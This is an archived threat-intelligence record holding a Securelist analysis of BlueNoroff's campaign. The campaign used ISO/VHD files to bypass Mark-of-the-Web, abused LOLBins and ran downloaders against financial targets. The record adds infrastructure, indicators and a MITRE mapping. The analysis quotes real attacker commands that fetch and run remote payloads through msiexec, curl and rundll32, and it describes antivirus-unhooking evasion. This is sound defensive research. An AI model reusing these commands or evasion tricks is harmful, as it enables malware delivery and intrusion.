{ "id": "c610d7f0-a1d0-40ce-880f-18345719a3c5", "created_at": "2026-04-06T00:12:43.013673Z", "updated_at": "2026-04-12T02:21:13.269519Z", "deleted_at": null, "sha1_hash": "a32de70007629718b37895834b71c889798328b0", "title": "BlueNoroff introduces new methods bypassing MoTW", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2246546, "plain_text": "BlueNoroff introduces new methods bypassing MoTW\r\nBy Seongsu Park\r\nPublished: 2022-12-27 · Archived: 2026-04-05 16:06:56 UTC\r\nBlueNoroff group is a financially motivated threat actor eager to profit from its cyberattack capabilities. We have\r\npublished technical details of how this notorious group steals cryptocurrency before. We continue to track the\r\ngroup’s activities and this October we observed the adoption of new malware strains in its arsenal. The group\r\nusually takes advantage of Word documents and uses shortcut files for the initial intrusion. However, it has\r\nrecently started to adopt new methods of malware delivery.\r\nThe first new method the group adopted is aimed at evading the Mark-of-the-Web (MOTW) flag, the security\r\nmeasure whereby Windows displays a warning message when the user tries to open a file downloaded from the\r\ninternet. To do this, optical disk image (.iso extension) and virtual hard disk (.vhd extension) file formats were\r\nused. This is a common tactic used nowadays to evade MOTW, and BlueNoroff has also adopted it.\r\nIn addition, the group tested different file types to refine malware delivery methods. We observed a new Visual\r\nBasic Script, a previously unseen Windows Batch file, and a Windows executable. It seems the actors behind\r\nBlueNoroff are expanding or experimenting with new file types to convey their malware efficiently.\r\nAfter researching the infrastructure that was utilized, we discovered more than 70 domains used by this group,\r\nmeaning they were very active until recently. Also, they created numerous fake domains that look like venture\r\ncapital and bank domains. Most of the domains imitate Japanese venture capital companies, indicating that the\r\ngroup has an extensive interest in Japanese financial entities.\r\nExecutive summary\r\nBlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures;\r\nBleuNoroff group expanded file types and tweaked infection methods;\r\nBlueNoroff created numerous fake domains impersonating venture capital companies and banks.\r\nBackground\r\nAt the end of September 2022, we observed new BlueNoroff malware in our telemetry. After a careful\r\ninvestigation, we confirmed that the actor had adopted new techniques to convey the final payload. The actor took\r\nadvantage of several scripts, including Visual Basic Script and Windows Batch script. They also started using disk\r\nimage file formats, .iso and .vhd, to deliver their malware. For intermediate infection, the actor introduced a\r\ndownloader to fetch and spawn the next stage payload. Although the initial intrusion methods were very different\r\nin this campaign, the final payload that we had analyzed previously was used without significant changes.\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 1 of 12\n\nNovel infection chain\r\nLong-lasting initial infection\r\nBased on our telemetry, we observed that one victim in the UAE was attacked using a malicious Word document.\r\nThe victim received a document file named “Shamjit Client Details Form.doc” on September 2, 2022.\r\nUnfortunately, we couldn’t acquire the document, but it was executed from the following path:\r\nC:\\Users\\[username]\\Desktop\\SALES OPS [redacted]\\[redacted]\\Signed Forms \u0026 Income Docs\\Shamjit Client\r\nDetails Form.doc\r\nJudging from the file path, we can assume that the victim was an employee in the sales department responsible for\r\nsigning contracts.\r\nUpon launch, the malicious document connects to the remote server and downloads the payload. In this particular\r\ncase, the executable ieinstal.exe was used to bypass UAC.\r\nRemote URL: https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=\r\nCreated payload path: %Profile%\\cr.dat\r\nSpawned command: cmd.exe %Profile%\\cr.dat 5pKwgIV5otiKb6JrNddaVJOaLjMkj4zED238vIU=\r\nAfter initial infection, we observed several keyboard hands-on activities by the operator. Through the implanted\r\nbackdoor, they attempted to fingerprint the victim and install additional malware with high privileges. Upon\r\ninfection, the operator executed several Windows commands to gather basic system information. They then\r\nreturned 18 hours later to install further malware with high privileges.\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 2 of 12\n\nPost-exploitation\r\nBased on our telemetry, when the malicious Word document opens it fetches the next payload from the remote\r\nserver:\r\nDownload URL: http://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=\r\nThe fetched payload is supposed to be saved in %Profile%\\update.dll. Eventually, the fetched file is spawned with\r\nthe following commands:\r\nCommand #1: rundll32.exe %Profile%\\update.dll,#1\r\n5pOygIlrsNaAYqx8JNZSTouZNjo+j5XEFHzxqIIqpQ==\r\nCommand #2: rundll32.exe %Profile%\\update.dll,#1 5oGygYVhos+IaqBlNdFaVJSfMiwhh4LCDn4=\r\nOne of the other methods the BlueNoroff group usually uses is a ZIP archive with a shortcut file. The archive file\r\nwe recently discovered contained a password-protected decoy document and a shortcut file named\r\n“Password.txt.lnk“. This is a classic BlueNoroff strategy to persuade the victim to execute the malicious shortcut\r\nfile to acquire the decoy document’s password. The latest archive file (MD5\r\n1e3df8ee796fc8a13731c6de1aed0818) discovered has a Japanese file name, 新しいボーナススケジュール.zip\r\n(Japanese for “New bonus schedule”), indicating they were interested in Japanese targets.\r\nThe main difference from the previous shortcut sample was that it fetched an additional script payload (Visual\r\nBasic Script or HTML Application); also, a different method of fetching and executing the next stage payload was\r\nadopted at this time. The command below was executed when the victim double-clicked on the shortcut file:\r\ncmd.exe /c DeviceCredentialDeployment \u0026 echo jbusguid\u003e %APPDATA%\\Pass.txt \u0026 start\r\n%APPDATA%\\Pass.txt \u0026\u0026 FOR %i IN (%systemroot%\\system32\\msiexec.*) DO msiexec -c /Q /i\r\nhxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd \u0026 timeout\r\nTo evade detection, the actor utilized Living Off the Land Binaries (LOLBins). The DeviceCredentialDeployment\r\nexecution is a well-known LOLBin used to hide the command’s windows. The actor also abused the msiexe.exe\r\nfile to silently launch the fetched Windows Installer file.\r\nUpdated method #1: Tricks to evade MOTW flag\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 3 of 12\n\nWe observed that the actor examined different file types to deliver their malware. Recently, many threat actors\nhave adopted image files to avoid MOTW (Mark-of-the-Web). In a nutshell, MOTW is a mitigation technique\nintroduced by Microsoft. The NTFS file system marks a file downloaded from the internet, and Windows handles\nthe file in a safe way. For example, when a Microsoft Office file is fetched from the internet, the OS opens it in\nProtected View, which restricts the execution of the embedded macro. In order to avoid this mitigation technique,\nmore threat actors have started abusing ISO file types. The BlueNoroff group likely experimented with ISO image\nfiles to deliver their malware. Although it’s still under development, we mention this sample as an early warning.\nThis ISO image file contains one PowerPoint slide show and one Visual Basic Script.\nEmbedded files of ISO image\nThe Microsoft PowerPoint file contains a link. When the user clicks the link, it executes the 1.vbs file through the\nWScript process. When we checked the VBS file, it only generated an “ok” message, which suggests BlueNoroff\nis still experimenting with this method.\n?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\nBased on our other findings, we discovered an in-the-wild sample (MD5 a17e9fc78706431ffc8b3085380fe29f)\nfrom VirusTotal. At the time of analysis, this .vhd sample wasn’t detected by any antivirus. The virtual disk file\ncontains a decoy PDF file, Windows executable file, and an encrypted Dump.bin file. The PDF and executable\nfiles have numerous spaces before the file extension to hide it and allay suspicions.\nFiles inside VHD a file\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\nPage 4 of 12\n\nThe Job_Description[spaces].exe file (MD5 931d0969654af3f77fc1dab9e2bd66b1) is a loader that loads the next\r\nstage payload. Upon launch, it copies the Dump.bin file to the %Templates%\\war[current time][random\r\nvalue].bin (i.e., war166812964324445.bin). The Dump.bin has a modified PE header. The malware reads the first\r\nbyte of Dump.bin, 0xAF in this file, and decodes 0x3E8 bytes with that key. The decrypted data is the header of a\r\nPE file, overwriting the recovered header to the original file. Eventually, it loads the decrypted DLL file by\r\nspawning the ordinary first export function.\r\nThe spawned downloader contains an encrypted configuration at the end of the file. The malware first acquires the\r\ntotal size of the configuration data and the length of the payload URL from the end of the file. They are located\r\nfour bytes and eight bytes from the end of the file, respectively. The malware decrypts the configuration data with\r\nthe RC4 algorithm using an embedded 64-byte key.\r\nRC4 key: 46 61 44 6D 38 43 74 42 48 37 57 36 36 30 77 6C 62 74 70 79 57 67 34 6A 79 4C 46 62 67 52\r\n33 49 76 52 77 36 45 64 46 38 49 47 36 36 37 64 30 54 45 69 6D 7A 54 69 5A 36 61 42 74 65 69 67 50 33\r\nRestored URL: hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D\r\nStructure of configuration\r\nIn the case of another downloader, however, the payload URL was delivered using a command line parameter.\r\nAlso, some of the other downloaders (MD5 f766f97eb213d81bf15c02d4681c50a4) have functionality that checks\r\nthe working environment. If the size of physical memory is less than 2,147,483,648 bytes, the malware terminates\r\nexecution.\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 5 of 12\n\nInfection flow of downloader\r\nThis downloader checks for the names of the following antivirus vendors: Sophos, Kaspersky, Avast, Avira,\r\nBitdefender, TrendMicro, and Windows Defender. If TrendMicro, BitDefender, or Windows Defender products\r\nare installed, the malware conducts a classic unhooking DLL trick intended to remove user-mode hooks from the\r\nsystem library. This evasion technique overwrites the .text section of the pre-loaded ntdll library with the freshly\r\nloaded one so that the hooked API addresses are recovered with the original API address. With this trick, the\r\nmalware can disable the functionalities of EDR/AV products. Next, the malware creates a mutex to avoid\r\nduplicate execution.\r\nMutex name: da9f0e7dc6c52044fa29bea5337b4792b8b873373ba99ad816d5c9f5f275f03f\r\nNext, the malware opens a PDF decoy document in the same directory. The decoy document masquerades as a job\r\noffer from a Japanese multinational bank.\r\nIf Windows Defender or Bitdefender Antivirus is installed on the victim’s computer, the malware executes itself\r\nwith the following commands:\r\nWindows Defender: cmd /c timeout /t 10 \u0026 Del /f /q \\”[current file name]\\” \u0026 attrib -s -h \\”[PDF decoy\r\nfile]\\” \u0026 rundll32 \\”[current DLL file path]\\” #1\r\nBitdefender: cmd /c timeout /t 10 \u0026 rundll32 \\”[current DLL file path]\\” #1\r\nThe primary objective of this malware is to fetch the next stage payload. To do this, the malware uses the cURL\r\nlibrary, combining cURL commands depending on the antivirus installed.\r\nAvira or Avast installed: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da\r\nOther cases: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d dl\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 6 of 12\n\nNote that the user-agent name is “cur1-agent“, and the malware sends “da” POST data if the victim installed\r\nAvira or Avast; otherwise, the malware sends “dl” POST data. If the fetched data by cURL command contains\r\n“\u003chtml\u003e” and “curl:”, the malware decrypts the payload with a delivered 64-byte RC4 key.\r\nIf Avira or Avast are installed, the malware saves the decrypted payload to “%TEMPLATES%\\marcoor.dll” and\r\nspawns it with the rundll32.exe command with the payload URL.\r\ncommand: exe %TEMPLATES%\\marcoor.dll #1 [payload URL]\r\nOtherwise, the malware doesn’t write the payload to the file and injects the fetched payload into the explorer.exe\r\nprocess. The fetched payload is a DLL type executable and its export function is spawned with the “payload\r\nURL”.\r\nUnfortunately, we haven’t been able to obtain a precise infection chain so far. From our telemetry, however, we\r\ncan confirm the victim was eventually compromised by backdoor-type malware. Based on the malware’s static\r\ninformation, and parts of the internal code, we assess that the final payload is still very similar to the Persistence\r\nBackdoor #2[1] we described in our previous blog.\r\nUpdated method #2: Scripts and novel downloader\r\nAdditionally, we observed the download and launch of a suspicious batch file. The actor exploited different\r\nLOLBins. The malware execution is done using a legitimate script, SyncAppvPublishingServer.vbs, in the system\r\nfolder. This script is for executing the PowerShell script via a Windows scheduled task.\r\nWScript.exe \"%system32%\\SyncAppvPublishingServer.vbs\"  \"n;cmd.exe '/c curl\r\nperseus.bond/Dgy_0dU08lC/hCHEdlDFGV/P89bXhClww/uiOHK5H35B/bM%3D -A cur1-agent -o\r\n%public%\\regsile.bat \u0026 start /b %public%\\regsile.bat'\r\nWe also observed the context around that batch file in our telemetry. The batch file name is “What is\r\nBlockchain.bat“. As the file name suggests, this group still targets the blockchain industry. We acquired the\r\nscriptlet of the batch file.\r\nxcopy /h /y /q How-To-Extension.pdf c:\\users\\public\\Inproc.exe*\r\nstart xcopy /h /y /q Blockchain-old.pdf c:\\users\\public\\rwinsta.exe*\r\nstart c:\\users\\public\\Inproc.exe \"%cd%\\Blockchain.pdf\"\r\nThe Inproc.exe is a legitimate mshta.exe file (MD5 0b4340ed812dc82ce636c00fa5c9bef2), and the rwinsta.exe is\r\na legitimate rundll32.exe file (MD5 ef3179d498793bf4234f708d3be28633). The Blockchain.pdf file is a\r\nmalicious HTML application file spawned by the mshta.exe process. Unfortunately, we don’t have the HTA script\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 7 of 12\n\n(Blockchain.pdf), but we can assume the functionality of the script based on our telemetry – showing the decoy\r\ndocument and fetching the next stage payload.\r\n# Create a decoy password file and open it.\r\ncmd.exe\" /c echo {PASSWORD}\u003e%documents%\\Userlink \u0026 notepad.exe %documents%\\Userlink\r\n# Fetch the payload with cURL command and execute.\r\ncmd.exe\" /c timeout 10 \u0026 curl\r\nperseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D -s -d md -A cur1-agent -\r\no %documents%\\macroor.dll\u0026 %documents%\\macroor.dll #1\r\nperseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D\r\nAlso, we observed this group introduce a new Windows executable-type downloader at this time. This malware\r\n(MD5 087407551649376d90d1743bac75aac8) spawns a fake password file while fetching a remote payload and\r\nexecuting it. Upon execution, it creates a fake file (wae.txt) to show a password composed of the string ‘password’\r\nand fetches a payload from the embedded URL and loads it. This scheme, showing a password via notepad.exe, is\r\na trick favored by the BlueNoroff group to avoid arousing the victim’s suspicion. Usually, the password contains\r\nthe password needed to open the supplied encrypted decoy document.\r\nSimple downloader with fake password file\r\nIt’s possible that the actor delivered the above Windows executable file in archive file format or disk image file\r\nformat with an encrypted decoy document.\r\nInfrastructure\r\nWhile carrying out this research we found several C2 servers used by the actor. All the servers are hosted by VPS\r\nvendors as usual and several of them were resolved to the same IP address. The domain registration could be\r\ntraced back to earlier in 2021, so this is an ongoing operation by the adversary.\r\nDomain IP ISP ASN\r\nofferings.cloud\r\ndocs.azure-protection.cloud\r\n104.168.174.80 Hostwinds LLC. AS54290\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 8 of 12\n\nbankofamerica.us.org\r\nperseus.bond\r\navid.lno-prima.lol\r\n104.168.249.50 Hostwinds LLC. AS54290\r\nofferings.cloud\r\nperseus.bond\r\ndocs.azure-protection.cloud\r\navid.lno-prima.lol\r\n152.89.247.87 combahton GmbH AS30823\r\nofferings.cloud 172.86.121.130 HIVELOCITY AS29802\r\nwww.capmarketreport.com 149.28.247.34 The Constant Company, LLC AS20473\r\nms.msteam.biz\r\nwww.onlinecloud.cloud\r\n155.138.159.45 The Constant Company, LLC AS20473\r\nThe actor usually used fake domains such as cloud hosting services for hosting malicious documents or payloads.\r\nThey also created fake domains disguised as legitimate companies in the financial industry and investment\r\ncompanies. The domains, including pivoted domains, imitate venture capital names or big bank names. Most of\r\nthe companies are Japanese companies, indicating the actor has a keen interest in Japanese markets.\r\nMalicious domains Genuine company Category of business Country\r\nbeyondnextventures.co\r\ncloud.beyondnextventures.co\r\nBeyond Next Ventures\r\n(https://beyondnextventures.com)\r\nVenture capital firm Japan\r\nsmbc.ltd\r\nsmbcgroup.us\r\nsmbc-vc.com\r\nSumitomo Mitsui Banking\r\nCorporation\r\n(https://www.smbc.co.jp)\r\nJapanese multinational\r\nbanking and financial\r\nservices\r\nJapan\r\ncloud.mufg.tokyo\r\nmufg.tokyo\r\nMitsubishi UFJ Financial Group\r\n(https://www.mufg.jp)\r\nBank in Japan Japan\r\nvote.anobaka.info\r\nANOBAKA\r\n(https://anobaka.jp)\r\nVenture capital firm Japan\r\nit.zvc.capital\r\nZ Venture Capital\r\n(https://zvc.vc)\r\nVenture capital firm Japan\r\nabf-cap.co\r\nABF Capital\r\n(https://www.abf-cap.com)\r\nVenture capital firm Japan\r\nangelbridge.capital\r\nAngel Bridge\r\n(https://www.angelbridge.jp)\r\nVenture capital firm Japan\r\nmizuhogroup.us\r\ncareers.mizuhogroup.us\r\nMizuho Financial Group\r\n(https://www.mizuhogroup.com)\r\nBanking holding\r\ncompany\r\nJapan\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 9 of 12\n\nbankofamerica.tel\r\nbankofamerica.nyc\r\nbankofamerica.us.org\r\nBank of America\r\n(https://www.bankofamerica.com)\r\nBank and financial\r\nservices holding\r\ncompany\r\nUSA\r\ntptf.us\r\ntptf.ltd\r\nTrans-Pacific Technology Fund\r\n(https://tptf.co)\r\nVenture capital firm Taiwan\r\nVictims\r\nAs we described in the section ‘Long-lasting initial infection’, we discovered that one victim in the UAE,\r\nprobably a home financing company, was compromised by classic BlueNoroff group malware. This financially\r\nmotivated threat actor has been attacking various cryptocurrency-related businesses lately, but also other financial\r\ncompanies, as in this case.\r\nIn addition, based on the domain naming and decoy documents, we assume, with low confidence, that the entities\r\nin Japan are on the radar of this group. In one PowerPoint sample, we observed that the actor took advantage of a\r\nJapanese venture capital company. Also, the samples we mentioned in the ‘Long-lasting initial infection’ section\r\nabove were delivered to the victim with a Japanese file name, suggesting the target can read Japanese.\r\nDecoy document\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 10 of 12\n\nConclusion\r\nAccording to a recent report, the BlueNoroff group stole cryptocurrency worth millions using their cyberattack\r\ncapabilities. It shows that this group has a strong financial motivation and actually succeeds in making profits\r\nfrom their cyberattacks. As we can see from our latest finding, this notorious actor has introduced slight\r\nmodifications to deliver their malware. This also suggests that attacks by this group are unlikely to decrease in the\r\nnear future.\r\nIndicators of compromise\r\nDownloader\r\n087407551649376d90d1743bac75aac8    regsile.exe\r\nCur1Agent downloader\r\nf766f97eb213d81bf15c02d4681c50a4\r\n61a227bf4c5c1514f5cbd2f37d98ef5b\r\n4c0fb06320d1b7ecf44ffd0442fc10ed\r\nd8f6290517c114e73e03ab30165098f6\r\nLoader\r\nd3503e87df528ce3b07ca6d94d1ba9fc    E:\\Readme.exe\r\n931d0969654af3f77fc1dab9e2bd66b1    Job_Description.       exe\r\nMalicious Virtual Disk File\r\na17e9fc78706431ffc8b3085380fe29f    Job_Description.vhd\r\nZip file and unzipped malicious shortcut\r\n1e3df8ee796fc8a13731c6de1aed0818    新しいボーナススケジュール.zip (New bonus schedule)\r\n21e9ddd5753363c9a1f36240f989d3a9    Password.txt.lnk\r\nURLs\r\nhxxp://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=\r\nhxxp://avid.lno-prima[.]lol/NafqhbXR7KC/rTVCtCpxPH/kMjTqFDDNt/fiOHK5H35B/bM%3D\r\nhxxp://offerings[.]cloud/NafqhbXR7KC/rTVCtCpxPH/pdQTpFN6FC/Lhr_wXGXix/nQ%3D\r\nhxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D\r\nhxxps://docs.azure-protection[.]cloud/%2BgFJKOpVX/4vRuFIaGlI/D%2BOfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D\r\nhxxps://docs.azure-protection[.]cloud/+gFJKOpVX/4vRuFIaGlI/D+OfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D\r\nhxxps://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=\r\nhxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd\r\nPivoted IP address\r\n152.89.247.87\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 11 of 12\n\n172.86.121.130\r\n104.168.174.80\r\nMITRE ATT\u0026CK Mapping\r\nTactic Technique Technique name\r\nInitial Access\r\nT1566.001\r\nT1566.002\r\nPhishing: Spearphishing Attachment\r\nPhishing: Spearphishing Link\r\nExecution\r\nT1059.003\r\nT1059.005\r\nT1204.001\r\nT1204.002\r\nCommand and Scripting Interpreter: Windows Command Shell\r\nCommand and Scripting Interpreter: Visual Basic\r\nUser Execution: Malicious Link\r\nUser Execution: Malicious File\r\nPersistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver\r\nDefense Evasion\r\nT1027.002\r\nT1497.001\r\nT1055.002\r\nT1553.005\r\nT1218.007\r\nT1218.011\r\nT1221\r\nObfuscated Files or Information: Software Packing\r\nVirtualization/Sandbox Evasion: System Checks\r\nProcess Injection: Portable Executable Injection\r\nSubvert Trust Controls: Mark-of-the-Web Bypass\r\nSystem Binary Proxy Execution: Msiexec\r\nSystem Binary Proxy Execution: Rundll32\r\nTemplate Injection\r\nCommand and Control T1071.001 Application Layer Protocol: Web Protocols\r\nExfiltration T1041 Exfiltration over C2 Channel\r\n[1]\r\n APT Intel report: BlueNoroff Launched a New Campaign To Attack Cryptocurrency Business\r\nSource: https://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "origins": [ "web" ], "references": [ "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" ], "report_names": [ "108383" ], "threat_actors": [ { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-12T02:00:03.625347Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-12T02:00:03.096111Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Hidden Cobra", "Bluenoroff", "Nickel Academy", "G0032", "Hastati Group", "NewRomanic Cyber Army Team", "Operation AppleJeus", "APT-C-26", "ATK117", "Sapphire Sleet", "Lazarus group", "Group 77", "COVELLITE", "ATK3", "BeagleBoyz", "Operation Troy", "Whois Hacking Team", "NICKEL GLADSTONE", "DEV-0139", "COPERNICIUM", "Black Artemis", "Dark Seoul", "Subgroup: Bluenoroff", "Operation GhostSecret", "Diamond Sleet", "Operation DarkSeoul", "Labyrinth Chollima", "APT 38", "TA404", "Unit 121", "Bureau 121", "APT38", "Stardust Chollima", "G0082", "DEV-1222", "Andariel", "Appleworm", "Citrine Sleet", "Moonstone Sleet" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-12T02:00:04.416249Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-12T02:00:04.689937Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434363, "ts_updated_at": 1775960473, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a32de70007629718b37895834b71c889798328b0.pdf", "text": "https://archive.orkl.eu/a32de70007629718b37895834b71c889798328b0.txt", "img": "https://archive.orkl.eu/a32de70007629718b37895834b71c889798328b0.jpg" } }